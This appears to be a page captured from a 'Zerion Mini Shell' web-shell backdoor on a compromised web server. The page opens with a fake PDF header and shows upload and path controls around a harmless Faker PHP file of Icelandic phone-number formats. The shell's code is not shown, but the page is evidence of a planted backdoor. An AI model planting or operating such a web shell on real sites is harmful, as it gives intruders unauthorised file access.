%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /var/www/html/coding/vendor/fzaninotto/faker/src/Faker/Provider/is_IS/
Upload File :
Create Path :
Current File : /var/www/html/coding/vendor/fzaninotto/faker/src/Faker/Provider/is_IS/PhoneNumber.php

<?php

namespace Faker\Provider\is_IS;

/**
 * @author Birkir Gudjonsson <birkir.gudjonsson@gmail.com>
 */
class PhoneNumber extends \Faker\Provider\PhoneNumber
{
    /**
     * @var array Icelandic phone number formats.
     */
    protected static $formats = array(
        '+354 ### ####',
        '+354 #######',
        '+354#######',
        '### ####',
        '#######',
    );
}

Zerion Mini Shell 1.0